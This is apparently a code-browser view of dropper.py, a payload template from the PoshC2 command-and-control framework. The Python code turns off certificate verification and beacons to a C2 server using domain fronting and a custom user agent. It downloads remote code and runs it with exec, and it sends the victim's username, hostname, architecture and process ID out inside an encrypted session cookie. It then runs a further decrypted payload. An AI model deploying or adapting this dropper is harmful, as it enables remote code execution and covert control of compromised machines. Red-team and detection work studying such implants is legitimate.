Codebase list poshc2 / 15d18e0 resources / payload-templates / dropper.py
15d18e0

Tree @15d18e0 (Download .tar.gz)

dropper.py @15d18e0raw · history · blame 

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
import urllib2,os,sys,base64,ssl,socket,pwd,hashlib,time
kdn=time.strptime("#REPLACEKILLDATE#","%Y-%m-%d")
pyhash="#REPLACEPYTHONHASH#"
pykey="#REPLACESPYTHONKEY#"
key="#REPLACEKEY#"
serverclean=[#REPLACEHOSTPORT#]
urlid="#REPLACEURLID#"
url=serverclean[0]+"#REPLACEQUICKCOMMAND#"
url2=serverclean[0]+"#REPLACECONNECTURL#"
hh=[#REPLACEDOMAINFRONT#]
ua="#REPLACEUSERAGENT#"
cstr=time.strftime("%Y-%m-%d",time.gmtime());cstr=time.strptime(cstr,"%Y-%m-%d")
# This doesn't exist in python < 2.7.9
if sys.version_info[0] == 3 or (sys.version_info[0] == 2 and sys.version_info[1] >= 7 and sys.version_info[2] >= 9):
    ssl._create_default_https_context=ssl._create_unverified_context
if hh: r=urllib2.Request(url,headers={'Host':hh,'User-agent':ua})
else: r=urllib2.Request(url,headers={'User-agent':ua})
res=urllib2.urlopen(r);d=res.read();c=d[1:];b=c.decode("hex")
s=hashlib.sha512(b)
if pykey in b and pyhash == s.hexdigest() and cstr < kdn: exec(b)
else: sys.exit(0)
un=pwd.getpwuid(os.getuid())[ 0 ];pid=os.getpid()
is64=sys.maxsize > 2**32;arch=('x64' if is64 == True else 'x86')
hn=socket.gethostname();o=urllib2.build_opener()
encsid=encrypt(key, '%s;%s;%s;%s;%s;%s' % (un,hn,hn,arch,pid,urlid))
if hh[0]:r=urllib2.Request(url2,headers={'Host':hh[0],'User-agent':ua,'Cookie':'SessionID=%s' % encsid})
else:r=urllib2.Request(url2,headers={'User-agent':ua,'Cookie':'SessionID=%s' % encsid})
res=urllib2.urlopen(r);html=res.read();x=decrypt(key, html).rstrip('\0');exec(base64.b64decode(x))